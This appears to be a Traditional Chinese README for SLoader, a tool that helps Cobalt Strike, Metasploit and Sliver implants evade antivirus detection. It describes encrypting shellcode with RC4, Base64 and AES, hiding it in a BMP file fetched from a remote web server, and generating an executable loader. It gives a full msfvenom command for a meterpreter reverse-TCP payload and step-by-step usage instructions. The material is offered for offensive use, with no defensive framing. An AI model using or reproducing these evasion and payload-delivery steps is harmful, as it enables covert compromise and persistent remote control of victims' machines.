SLoader 是一個幫助遠端控制工具繞過防毒軟體檢測的工具。
在進行深入攻防滲透時,常常需要植入 Cobalt Strike、Metasploit Framework、sliver 等工具的木馬程序來維持權限,但會被防毒軟體檢測到。Loader 可以協助遠端控制工具繞過 Defender、趨勢科技、Norton、McAfee 等防毒軟體的檢測。
自訂擴展:利用模板自訂加載方式,創造新的加載方式。
隨機哈希:隨機生成檔案名稱,並以時間戳作為鍵對 URL 進行加密。
隱秘連結:loader 遠端加密連結 payload。
多重加密:使用 RC4、Base64、AES 演算法進行 payload 的加解密。
編譯環境:生成器、編碼器與加載模板均使用 C++ 開發,通過 Visual Studio 2022 靜態編譯。
編譯方式:通過 Visual Studio 2022 打開解決方案 (*.sln),選擇 release、x64 進行編譯。或直接下載使用realse。
使用 Cobalt Strike 生成 raw 格式的 shellcode 檔案(shellcode 的位元數取決於加載器模板的位元數),或者可以使用 msfvenom(msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=x -f raw -o beacon.bin)
通過 encode 對 shellcode 進行加密(加密金鑰需要 16 位元組)
將生成的 bmp 檔案上傳至遠端 WEB 伺服器生成下載連結(訪問 URL 可直接下載檔案)
打開生成器,填寫 bmp 檔案的 URL 與加密金鑰,選擇自訂的加載器模板(DATA 目錄)
點選 Generate,桌面上會生成可執行的加載器檔案
![image]